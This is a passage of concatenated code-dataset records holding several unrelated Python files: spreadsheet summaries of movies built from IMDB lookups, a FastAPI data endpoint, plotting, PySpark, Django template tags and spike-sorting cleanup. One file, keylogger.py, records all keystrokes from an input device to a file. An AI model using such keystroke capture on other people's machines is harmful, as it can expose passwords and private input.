= []\n\n movie_sheet = wb.add_worksheet('movies')\n ss_sheet = wb.add_worksheet('series summary')\n s_sheet = wb.add_worksheet('series')\n\n is_headers_row = True\n\n for row in workbook.active.rows:\n if is_headers_row:\n is_headers_row = False\n continue\n\n movie_series_type = row[list(schedule_headers_map).index('type')].value\n title = row[list(schedule_headers_map.keys()).index('title')].value\n\n if movie_series_type == 'film':\n existing_movie_record = list(filter(lambda m: m.title == title, movie_rows))\n\n if not existing_movie_record:\n cast = row[list(schedule_headers_map).index('cast')].value\n mr = IMDB.get_movie_row(title=title, cast=cast)\n\n if mr:\n movie_rows.append(mr)\n else:\n print(\"Existing movie record for title: \" + title)\n\n elif movie_series_type == 'series':\n ep_number = row[list(schedule_headers_map.keys()).index('episode')].value\n season = row[list(schedule_headers_map.keys()).index('season')].value\n series_detail_row = IMDB.get_summary_detail_row(title=title, episode=ep_number, season=season)\n\n if series_detail_row:\n series_rows.append(series_detail_row)\n series_row = list(filter(lambda r: r.title == title and r.season == season, series_summary_rows))\n\n if series_row: # Row with the season and title already exists\n series_row[0].increment_count() # Increment number of episodes for this season\n else:\n print(\"Created new Summary Row for : \" + title)\n sr = SeriesSummaryRow(title=title, type='series', season=season, season_year=series_detail_row.season_year)\n series_summary_rows.append(sr)\n\n series_rows.sort(key=lambda m: m.title)\n movie_rows.sort(key=lambda m: m.title)\n series_summary_rows.sort(key=lambda m: m.title)\n\n for c, h in enumerate(series_headers_map.keys()): # Write headers to series sheet\n s_sheet.write(alpha[c] + 
str(1), series_headers_map[h])\n\n for row, series_row in enumerate(series_rows):\n for i, field_name in enumerate(series_headers_map.keys()):\n s_sheet.write(alpha[i] + str(row+2), getattr(series_row, field_name))\n\n for c, h in enumerate(vars(SeriesSummaryRow('', '', '')).keys()): # Write headers series summary sheet\n ss_sheet.write(alpha[c] + str(1), series_summary_headers[h])\n\n for row, series_row in enumerate(series_summary_rows):\n for i, field_name in enumerate(vars(series_row).keys()): # Get attribute of SummaryRow object\n ss_sheet.write(alpha[i] + str(row + 2), getattr(series_row, field_name))\n\n for c, h in enumerate(vars(MovieRow()).keys()): # Write headers series summary sheet\n movie_sheet.write(alpha[c] + str(1), movie_summary_headers[h])\n\n for row, movie_row in enumerate(movie_rows):\n for i, field_name in enumerate(vars(movie_row).keys()): # Get attribute of MovieRow object\n movie_sheet.write(alpha[i] + str(row + 2), getattr(movie_row, field_name))\n\n print(\"\\n\\nExecution complete, exiting..\\n\\n\")\n wb.close()\n\n\nif __name__ == '__main__':\n generate_summary_worksheet_from_newest_schedule()\n", "sub_path": "summary.py", "file_name": "summary.py", "file_ext": "py", "file_size_in_byte": 4440, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "definitions.CORE_PATH", "line_number": 20, "usage_type": "argument"}, {"api_name": "openpyxl.load_workbook", "line_number": 29, "usage_type": "call"}, {"api_name": "definitions.CORE_PATH", "line_number": 29, "usage_type": "name"}, {"api_name": "xlsxwriter.Workbook", "line_number": 32, "usage_type": "call"}, {"api_name": "definitions.CORE_PATH", "line_number": 32, "usage_type": "name"}, {"api_name": "util.util.get_current_date_string", "line_number": 32, "usage_type": "call"}, {"api_name": "util.util.schedule_headers_map", "line_number": 49, "usage_type": "argument"}, {"api_name": "util.util.schedule_headers_map.keys", "line_number": 50, "usage_type": "call"}, {"api_name": "util.util.schedule_headers_map", "line_number": 50, "usage_type": "name"}, {"api_name": "util.util.schedule_headers_map", "line_number": 56, "usage_type": "argument"}, {"api_name": "enrich.imdb.get_movie_row", "line_number": 57, "usage_type": "call"}, {"api_name": "enrich.imdb", "line_number": 57, "usage_type": "name"}, {"api_name": "util.util.schedule_headers_map.keys", "line_number": 65, "usage_type": "call"}, {"api_name": "util.util.schedule_headers_map", "line_number": 65, "usage_type": "name"}, {"api_name": "util.util.schedule_headers_map.keys", "line_number": 66, "usage_type": "call"}, {"api_name": "util.util.schedule_headers_map", "line_number": 66, "usage_type": "name"}, {"api_name": "enrich.imdb.get_summary_detail_row", "line_number": 67, "usage_type": "call"}, {"api_name": "enrich.imdb", "line_number": 67, "usage_type": "name"}, {"api_name": "core.abstract.SeriesSummaryRow", "line_number": 77, "usage_type": "call"}, {"api_name": "util.util.series_headers_map.keys", "line_number": 84, "usage_type": "call"}, {"api_name": "util.util.series_headers_map", "line_number": 84, "usage_type": "name"}, {"api_name": "util.util.alpha", "line_number": 85, "usage_type": "name"}, {"api_name": "util.util.series_headers_map", "line_number": 85, "usage_type": "name"}, {"api_name": "util.util.series_headers_map.keys", "line_number": 88, "usage_type": "call"}, {"api_name": "util.util.series_headers_map", "line_number": 88, 
"usage_type": "name"}, {"api_name": "util.util.alpha", "line_number": 89, "usage_type": "name"}, {"api_name": "core.abstract.SeriesSummaryRow", "line_number": 91, "usage_type": "call"}, {"api_name": "util.util.alpha", "line_number": 92, "usage_type": "name"}, {"api_name": "util.util.series_summary_headers", "line_number": 92, "usage_type": "name"}, {"api_name": "util.util.alpha", "line_number": 96, "usage_type": "name"}, {"api_name": "core.abstract.MovieRow", "line_number": 98, "usage_type": "call"}, {"api_name": "util.util.alpha", "line_number": 99, "usage_type": "name"}, {"api_name": "util.util.movie_summary_headers", "line_number": 99, "usage_type": "name"}, {"api_name": "util.util.alpha", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "369614866", "text": "import time\nimport argparse\nfrom subprocess import Popen, PIPE\n\nparser = argparse.ArgumentParser(description=\"Record Keypresses. Ctrl+q to stop recording\")\nparser.add_argument(\"inputid\", type=int, help=\"input device id (xinput list)\")\nparser.add_argument(\"output\", type=str, help=\"output file\")\nargs = parser.parse_args()\n\nkeycodes = {}\np = Popen([\"xmodmap\", \"-pke\"], stdout=PIPE)\nfor line in p.stdout:\n words = str(line).split()\n key = words[1]\n value = words[3] if len(words) > 3 else \"\"\n keycodes[key] = value\n\nisLeftControlDown = False\nisRightControlDown = False\nf = open(args.output, \"w\")\nstart = time.time()\np = Popen([\"xinput\", \"test\", str(args.inputid)], stdout=PIPE)\nfor line in p.stdout:\n words = str(line).split()\n goingdown = words[1] == \"press\"\n key = keycodes.get(words[2])\n if key == \"Control_L\":\n isLeftControlDown = goingdown\n if key == \"Control_R\":\n isRightControlDown = goingdown\n if key == \"q\" and (isLeftControlDown or isRightControlDown):\n break\n s = []\n s.append(str(time.time() - start))\n s.append(\"keydown\" if goingdown else \"keyup\")\n s.append(key)\n f.write(\" \".join(s))\n f.write(\"\\n\")\n", "sub_path": "keylogger.py", "file_name": "keylogger.py", "file_ext": "py", "file_size_in_byte": 1180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 5, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 11, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 11, "usage_type": "name"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 22, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 22, "usage_type": "name"}, {"api_name": "time.time", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "225940442", "text": "from fastapi import APIRouter\nimport pandas as pd\nimport json\nimport csv\nimport io\nimport requests\n\nrouter = APIRouter()\n\n\n# /final-data endpoint\n@router.get(\"/final-data\")\nasync def final_data():\n # output = sites_ids.to_json(orient=\"records\")\n # parsed = json.loads(output)\n # return parsed\n \"\"\"\n Desired Format\n{\n project_code: 1014107,\n district: \"whatever\",\n province: \"province\",\n sector: \"sector\",\n cell: \"cell\",\n village: \"village\",\n village_id: 342343,\n name: \"Buzi\",\n type: \"Suspended\",\n stage: \"Rejected\",\n sub_stage: \"Technical\",\n individuals_directly_served: 0.0,\n span: \"\",\n lat: -2.42056,\n long: 28.9662,\n communities_served: [\n \"Agahehe\",\n \"Kabacuzi\",\n \"Kamutozo\",\n \"Kamweko\",\n ],\n};\n \"\"\"\n\n # Loading data from URL\n request 
= requests.get(\n \"https://raw.githubusercontent.com/Lambda-School-Labs/Labs25-Bridges_to_Prosperity-TeamB-ds/main/data/edit/B2P_Rwanda_Sites%2BIDs_full_2020-09-21.csv\"\n )\n buff = io.StringIO(request.text)\n directread = csv.DictReader(buff)\n\n output = {}\n\n # Loop over rows and return according to desired format\n for row in directread:\n\n # splitting \"communities_served\" into list of strings with every\n # iteration\n if len(row[\"communities_served\"]) == 0:\n communities_served = [\"unavailable\"]\n else:\n communities_served = list(row[\"communities_served\"].split(\", \"))\n\n # Set key for dictionary\n key = row[\"project_code\"]\n\n # Set output format\n output[key] = {\n \"project_code\": row[\"project_code\"],\n \"province\": row[\"province\"],\n \"district\": row[\"district\"],\n \"sector\": row[\"sector\"],\n \"cell\": row[\"cell\"],\n \"village\": row[\"village\"],\n \"village_id\": row[\"village_id\"],\n \"name\": row[\"name\"],\n \"type\": row[\"type\"],\n \"stage\": row[\"stage\"],\n \"sub_stage\": row[\"sub_stage\"],\n \"Individuals_directly_served\": int(row[\"Individuals_directly_served\"]),\n \"span\": int(row[\"span\"]),\n \"lat\": float(row[\"lat\"]),\n \"long\": float(row[\"long\"]),\n \"communities_served\": communities_served,\n }\n\n # Return output\n return output\n", "sub_path": "project/app/api/final_data.py", "file_name": "final_data.py", "file_ext": "py", "file_size_in_byte": 2297, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "fastapi.APIRouter", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 45, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 48, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "213330651", "text": "import numpy as np\nimport scipy.special\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nrc = {'lines.linewidth' : 2, 'axes.labelsize' : 18, 'axes.titlesize' : 18}\nsns.set(rc=rc)\n\ndef ecdf(data):\n \"\"\"\n Compute x, y values for an empirical distribution function\n \"\"\"\n\n x = np.sort(data)\n y = np.arange(1, 1+len(x)) / len(x)\n\n return x, y\n\n#Load data\nxa_high = np.loadtxt('data/xa_high_food.csv', comments='#')\nxa_low = np.loadtxt('data/xa_low_food.csv', comments='#')\n\nx_high, y_high = ecdf(xa_high)\nx_low, y_low = ecdf(xa_low)\n\nplt.plot(x_high, y_high, marker='.', linestyle='none', markersize='20', alpha=0.5)\nplt.plot(x_low, y_low, marker='.', linestyle='none', markersize='20', alpha=0.5)\nplt.xlabel('Cross-sectional area (um)')\nplt.ylabel('eCDF')\nplt.legend(('x high', 'x low'), loc='upper right')\nplt.show()\n", "sub_path": "lesson023-024b.py", "file_name": "lesson023-024b.py", "file_ext": "py", "file_size_in_byte": 836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "seaborn.set", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"},
{"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "431176864", "text": "# -*- coding: utf-8 -*-\nimport logging\n\nfrom django import template\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom django.utils.safestring import mark_safe\n\nfrom opps.containers.models import ContainerBox\n\n\nregister = template.Library()\nlogger = logging.getLogger()\n\n\n@register.simple_tag(takes_context=True)\ndef get_articlebox(context, slug, template_name=None):\n\n try:\n box = ContainerBox.objects.get(site=settings.SITE_ID, slug=slug,\n date_available__lte=timezone.now(),\n published=True)\n except ContainerBox.DoesNotExist:\n box = None\n\n t = template.loader.get_template('articles/articlebox_detail.html')\n if template_name:\n t = template.loader.get_template(template_name)\n\n return t.render(template.Context({\n 'articlebox': box,\n 'slug': slug,\n 'context': context}\n ))\n\n\n@register.simple_tag\ndef get_all_articlebox(channel_long_slug, template_name=None):\n boxes = ContainerBox.objects.filter(\n site=settings.SITE_ID,\n date_available__lte=timezone.now(),\n published=True,\n channel_long_slug=channel_long_slug)\n\n t = template.loader.get_template('articles/articlebox_list.html')\n if template_name:\n t = template.loader.get_template(template_name)\n\n return t.render(template.Context({'articleboxes': boxes}))\n\n\n@register.simple_tag\ndef get_post_content(post, template_name='articles/post_related.html',\n content_field='content', related_name='related_posts',\n get_related=True, safe=True, divider=\"
    \",\n placeholder=settings.OPPS_RELATED_POSTS_PLACEHOLDER):\n \"\"\"\n takes the post and tries to find the related posts to embed inside\n the content, if not found return only the content.\n\n post:\n Post instance\n template_name:\n path to template which receives the related posts\n content_field:\n name of the field with post content\n related_name:\n a m2m field name or a @property name which\n returns a queryset of related posts\n get_related:\n if False bypass and return only the content\n safe:\n if True mark the content as safe\n divider:\n used when there is no placeholder\n placeholder:\n the string to replace ex: --related--\n \"\"\"\n if not hasattr(post, content_field):\n return None\n content = getattr(post, content_field, '')\n if not get_related:\n return content\n\n related_posts = getattr(post, related_name, None)\n\n if not related_posts.exists():\n return mark_safe(content)\n\n # GET THE TEMPLATE\n t = template.loader.get_template(template_name)\n related_rendered = t.render(\n template.Context({'post': post, related_name: related_posts})\n )\n # EMBED RELATED POSTS\n if placeholder in content:\n return mark_safe(content.replace(\n placeholder,\n related_rendered\n ))\n else:\n return mark_safe(content + divider + related_rendered)\n\n\n@register.simple_tag\ndef get_url(obj, http=False, target=None, url_only=False):\n\n if not hasattr(obj, 'child_class'):\n return obj.get_absolute_url()\n\n try:\n _url = obj.get_absolute_url()\n _target = target or '_self'\n _is_link = obj.child_class == 'Link'\n # Determine if it's a local or foreign link\n if _is_link and not obj.link.is_local() and not target:\n _target = '_blank'\n # Determine url type\n if http:\n _url = 'http://{}{}'.format(\n obj.site,\n obj.get_absolute_url())\n if url_only:\n return _url\n return 'href=\"{}\" target=\"{}\"'.format(_url, _target)\n except Exception as e:\n logger.error(\"Exception at templatetag get_url: {}\".format(e))\n return obj.get_absolute_url()\n", "sub_path": "opps/articles/templatetags/article_tags.py", "file_name": "article_tags.py", "file_ext": "py", "file_size_in_byte": 3931, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.template.Library", "line_number": 12, "usage_type": "call"}, {"api_name": "django.template", "line_number": 12, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 13, "usage_type": "call"}, {"api_name": "opps.containers.models.ContainerBox.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "opps.containers.models.ContainerBox.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "opps.containers.models.ContainerBox", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.settings.SITE_ID", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 20, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 21, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 21, "usage_type": "name"}, {"api_name": "opps.containers.models.ContainerBox.DoesNotExist", "line_number": 23, "usage_type": "attribute"}, {"api_name": "opps.containers.models.ContainerBox", "line_number": 23, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 26, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 26, 
"usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 28, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 28, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 30, "usage_type": "call"}, {"api_name": "django.template", "line_number": 30, "usage_type": "name"}, {"api_name": "opps.containers.models.ContainerBox.objects.filter", "line_number": 39, "usage_type": "call"}, {"api_name": "opps.containers.models.ContainerBox.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "opps.containers.models.ContainerBox", "line_number": 39, "usage_type": "name"}, {"api_name": "django.conf.settings.SITE_ID", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 41, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 41, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 45, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 45, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 47, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 47, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 47, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 49, "usage_type": "call"}, {"api_name": "django.template", "line_number": 49, "usage_type": "name"}, {"api_name": "django.conf.settings.OPPS_RELATED_POSTS_PLACEHOLDER", "line_number": 56, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 88, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 91, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 91, "usage_type": "attribute"}, {"api_name": "django.template", "line_number": 91, "usage_type": "name"}, {"api_name": "django.template.Context", "line_number": 93, "usage_type": "call"}, {"api_name": "django.template", "line_number": 93, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 97, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "92070831", "text": "import sys\n\nfrom pyspark.sql import SparkSession, Row\n\nif __name__ == '__main__':\n\n # Create SparkSession\n spark = (SparkSession\n .builder\n .appName('RowsOperations')\n .getOrCreate())\n\n # Create Row object\n data_rows = [Row('Sheldon Cooper', 31), Row('Howard Wolowitz', 32)]\n\n # Read JSON file into DataFrame\n user_df = (spark.createDataFrame(data_rows, ['Name', 'Age']))\n\n # Column expr use\n user_df.show(n=20, truncate=False)\n\n # Stop spark session\n spark.stop()\n", "sub_path": "ColumnsAndRows/src/rowsOps.py", "file_name": "rowsOps.py", "file_ext": "py", "file_size_in_byte": 484, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 8, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 8, "usage_type": 
"attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 8, "usage_type": "name"}, {"api_name": "pyspark.sql.Row", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "53555216", "text": "\"\"\"\nSome heuristic method to clean after clustering:\n * auto-split\n * auto-merge\n\n\"\"\"\n\n\nimport numpy as np\nimport os\nimport time\n\nimport sklearn\nimport sklearn.cluster\nimport sklearn.mixture\nimport sklearn.metrics\nimport sklearn.decomposition\n\nfrom joblib import Parallel, delayed\n\n\n\n\nimport matplotlib.pyplot as plt\n\n\n\nfrom .dip import diptest\nfrom .waveformtools import equal_template\n\n\nimport hdbscan\n\ndebug_plot = False\n#~ debug_plot = True\n\n\ndef _get_sparse_waveforms_flatten(cc, dense_mode, label, channel_adjacency, n_spike_for_centroid=None):\n peak_index, = np.nonzero(cc.all_peaks['cluster_label'] == label)\n if n_spike_for_centroid is not None and peak_index.size>n_spike_for_centroid:\n keep = np.random.choice(peak_index.size, n_spike_for_centroid, replace=False)\n peak_index = peak_index[keep]\n\n if dense_mode:\n waveforms = cc.get_some_waveforms(peak_index, channel_indexes=None)\n extremum_channel = 0\n centroid = np.median(waveforms, axis=0)\n else:\n waveforms = cc.get_some_waveforms(peak_index, channel_indexes=None)\n centroid = np.median(waveforms, axis=0)\n \n peak_sign = cc.info['peak_detector_params']['peak_sign']\n n_left = cc.info['waveform_extractor_params']['n_left']\n \n if peak_sign == '-':\n extremum_channel = np.argmin(centroid[-n_left,:], axis=0)\n elif peak_sign == '+':\n extremum_channel = np.argmax(centroid[-n_left,:], axis=0)\n # TODO by sparsity level threhold and not radius\n adjacency = channel_adjacency[extremum_channel]\n waveforms = waveforms.take(adjacency, axis=2)\n \n wf_flat = waveforms.swapaxes(1,2).reshape(waveforms.shape[0], -1)\n \n return waveforms, wf_flat, peak_index\n \n\ndef _compute_one_dip_test(cc, dirname, chan_grp, label, n_components_local_pca, adjacency_radius_um):\n # compute dip test to try to over split\n from .dataio import DataIO\n from .catalogueconstructor import CatalogueConstructor\n \n if cc is None:\n dataio = DataIO(dirname)\n cc = CatalogueConstructor(dataio=dataio, chan_grp=chan_grp)\n\n peak_sign = cc.info['peak_detector_params']['peak_sign']\n dense_mode = cc.info['mode'] == 'dense'\n n_left = cc.info['waveform_extractor_params']['n_left']\n n_right = cc.info['waveform_extractor_params']['n_right']\n peak_width = n_right - n_left\n nb_channel = cc.nb_channel\n \n if dense_mode:\n channel_adjacency = {c: np.arange(nb_channel) for c in range(nb_channel)}\n else:\n channel_adjacency = {}\n for c in range(nb_channel):\n nearest, = np.nonzero(cc.channel_distances[c, :] < adjacency_radius_um)\n channel_adjacency[c] = nearest\n\n \n waveforms, wf_flat, peak_index = _get_sparse_waveforms_flatten(cc, dense_mode, label, channel_adjacency, n_spike_for_centroid=cc.n_spike_for_centroid)\n \n \n #~ pca = sklearn.decomposition.IncrementalPCA(n_components=n_components_local_pca, whiten=True)\n \n n_components = min(wf_flat.shape[1]-1, n_components_local_pca)\n pca = sklearn.decomposition.TruncatedSVD(n_components=n_components)\n \n feats = pca.fit_transform(wf_flat)\n pval = diptest(np.sort(feats[:, 0]), numt=200)\n \n return pval\n\n\n \n\n\ndef auto_split(catalogueconstructor, \n n_spike_for_centroid=None,\n adjacency_radius_um = 30,\n n_components_local_pca=3,\n pval_thresh=0.1,\n min_cluster_size=20,\n maximum_shift=2,\n n_jobs=-1,\n #~ n_jobs=1,\n joblib_backend='loky',\n ):\n cc = 
catalogueconstructor\n peak_sign = cc.info['peak_detector_params']['peak_sign']\n dense_mode = cc.info['mode'] == 'dense'\n n_left = cc.info['waveform_extractor_params']['n_left']\n n_right = cc.info['waveform_extractor_params']['n_right']\n peak_width = n_right - n_left\n nb_channel = cc.nb_channel\n \n if dense_mode:\n channel_adjacency = {c: np.arange(nb_channel) for c in range(nb_channel)}\n else:\n channel_adjacency = {}\n for c in range(nb_channel):\n nearest, = np.nonzero(cc.channel_distances[c, :] < adjacency_radius_um)\n channel_adjacency[c] = nearest\n \n if len(cc.positive_cluster_labels) ==0:\n return\n \n m = np.max(cc.positive_cluster_labels) + 1\n \n # pvals = []\n # for label in cc.positive_cluster_labels:\n #  pval = _compute_one_dip_test(cc.dataio.dirname, cc.chan_grp, label, n_components_local_pca, adjacency_radius_um)\n #  print('label', label,'pval', pval, pval1:\n for i, sub_label in enumerate(unique_sub_labels):\n sub_mask = sub_labels == sub_label\n \n if dense_mode:\n valid=True\n else:\n valid = peak_is_aligned[i]\n #~ print('sub_label', 'valid', valid)\n \n if sub_label == -1 or not valid:\n #~ cluster_labels[ind_keep[sub_mask]] = -1\n cc.all_peaks['cluster_label'][peak_index[sub_mask]] = -1\n else:\n #~ cluster_labels[ind_keep[sub_mask]] = sub_label + m \n new_label = label + m\n #~ print(label, m, new_label)\n cc.all_peaks['cluster_label'][peak_index[sub_mask]] = new_label\n cc.add_one_cluster(new_label)\n \n m += 1\n \n cc.pop_labels_from_cluster([label])\n \n #~ m += np.max(unique_sub_labels) + 1\n \n\n #~ if True:\n #~ if False:\n if debug_plot:\n print('label', label,'pval', pval, pval=0:\n ax.plot(np.median(wf_flat[sub_mask], axis=0), color=color, lw=2, ls=ls)\n \n for sub_label in unique_sub_labels:\n if dense_mode:\n valid=True\n else:\n valid = peak_is_aligned[i] \n \n sub_mask = sub_labels == sub_label\n color = colors[sub_label]\n if valid:\n color = colors[sub_label]\n else:\n color = 'k'\n ax = axs[1]\n ax.plot(feats[sub_mask].T, color=color, alpha=0.1)\n \n ax = axs[2]\n ax.scatter(feats[sub_mask][:, 0], feats[sub_mask][:, 1], color=color)\n plt.show()\n\n\n\ndef check_peak_all_aligned(local_labels, waveforms, peak_sign, n_left, maximum_shift):\n peak_is_aligned = []\n for k in np.unique(local_labels):\n wfs = waveforms[local_labels == k]\n centroid = np.median(wfs, axis=0)\n \n if peak_sign == '-':\n chan_peak_local = np.argmin(np.min(centroid, axis=0))\n pos_peak = np.argmin(centroid[:, chan_peak_local])\n elif peak_sign == '+':\n chan_peak_local = np.argmax(np.max(centroid, axis=0))\n pos_peak = np.argmax(centroid[:, chan_peak_local]) \n \n al = np.abs(-n_left - pos_peak) <= maximum_shift\n peak_is_aligned.append(al)\n \n return np.array(peak_is_aligned)\n\n\n\ndef trash_not_aligned(cc, maximum_shift=2):\n n_left = cc.info['waveform_extractor_params']['n_left']\n peak_sign = cc.info['peak_detector_params']['peak_sign']\n \n to_remove = []\n for k in list(cc.positive_cluster_labels):\n #~ print(k)\n\n centroid = cc.get_one_centroid(k)\n \n if peak_sign == '-':\n chan_peak = np.argmin(np.min(centroid, axis=0))\n extremum_index = np.argmin(centroid[:, chan_peak])\n peak_val = centroid[-n_left, chan_peak]\n elif peak_sign == '+':\n chan_peak = np.argmax(np.max(centroid, axis=0))\n extremum_index = np.argmax(centroid[:, chan_peak])\n peak_val = centroid[-n_left, chan_peak]\n\n if np.abs(-n_left - extremum_index)>maximum_shift:\n if debug_plot:\n n_left = cc.info['waveform_extractor_params']['n_left']\n n_right = 
cc.info['waveform_extractor_params']['n_right']\n peak_width = n_right - n_left\n \n print('remove not aligned peak', 'k', k)\n fig, ax = plt.subplots()\n #~ centroid = centroids[k]\n ax.plot(centroid.T.flatten())\n ax.set_title('not aligned peak')\n for i in range(centroid.shape[1]):\n ax.axvline(i*peak_width-n_left, color='k')\n plt.show()\n \n mask = cc.all_peaks['cluster_label'] == k\n cc.all_peaks['cluster_label'][mask] = -1\n to_remove.append(k)\n \n \n cc.pop_labels_from_cluster(to_remove)\n\n\ndef auto_merge(catalogueconstructor,\n auto_merge_threshold=2.3,\n maximum_shift=2,\n amplitude_factor_thresh = 0.2,\n ):\n cc = catalogueconstructor\n peak_sign = cc.info['peak_detector_params']['peak_sign']\n #~ dense_mode = cc.info['mode'] == 'dense'\n n_left = cc.info['waveform_extractor_params']['n_left']\n n_right = cc.info['waveform_extractor_params']['n_right']\n peak_width = n_right - n_left\n threshold = cc.info['peak_detector_params']['relative_threshold']\n \n while True:\n \n labels = cc.positive_cluster_labels.copy()\n \n \n nb_merge = 0\n \n n = labels.size\n \n #~ pop_from_centroids = []\n new_centroids = []\n pop_from_cluster = []\n for i in range(n):\n k1 = labels[i]\n if k1 == -1:\n # this can have been removed yet\n continue\n \n for j in range(i+1, n):\n k2 = labels[j]\n if k2 == -1:\n # this can have been removed yet\n continue\n \n #~ print(k1, k2)\n #~ print(' k2', k2)\n \n ind1 = cc.index_of_label(k1)\n extremum_amplitude1 = np.abs(cc.clusters[ind1]['extremum_amplitude'])\n centroid1 = cc.get_one_centroid(k1)\n\n ind2 = cc.index_of_label(k2)\n extremum_amplitude2 = np.abs(cc.clusters[ind2]['extremum_amplitude'])\n centroid2 = cc.get_one_centroid(k2)\n \n thresh = max(extremum_amplitude1, extremum_amplitude2) * amplitude_factor_thresh\n thresh = max(thresh, auto_merge_threshold)\n #~ print('thresh', thresh)\n \n #~ t1 = time.perf_counter()\n do_merge = equal_template(centroid1, centroid2, thresh=thresh, n_shift=maximum_shift)\n #~ t2 = time.perf_counter()\n #~ print('equal_template', t2-t1)\n \n #~ print('do_merge', do_merge)\n \n #~ if debug_plot:\n #~ print(k1, k2)\n #~ if k1==4 and k2==5:\n #~ print(k1, k2, do_merge, thresh)\n #~ fig, ax = plt.subplots()\n #~ ax.plot(centroid1.T.flatten())\n #~ ax.plot(centroid2.T.flatten())\n #~ ax.set_title('merge ' + str(do_merge))\n #~ plt.show()\n \n \n \n \n if do_merge:\n #~ print('merge', k1, k2)\n #~ cluster_labels2[cluster_labels2==k2] = k1\n\n mask = cc.all_peaks['cluster_label'] == k2\n cc.all_peaks['cluster_label'][mask] = k1\n \n #~ t1 = time.perf_counter()\n #~ cc.compute_one_centroid(k1)\n #~ t2 = time.perf_counter()\n #~ print('cc.compute_one_centroid', t2-t1)\n \n new_centroids.append(k1)\n pop_from_cluster.append(k2)\n \n labels[j] = -1\n \n nb_merge += 1\n \n if debug_plot:\n \n fig, ax = plt.subplots()\n ax.plot(centroid1.T.flatten())\n ax.plot(centroid2.T.flatten())\n ax.set_title('merge '+str(k1)+' '+str(k2))\n plt.show()\n \n #~ for k in 